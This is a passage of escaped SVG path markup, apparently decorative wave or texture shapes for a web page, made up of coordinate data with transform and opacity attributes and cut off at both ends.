.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 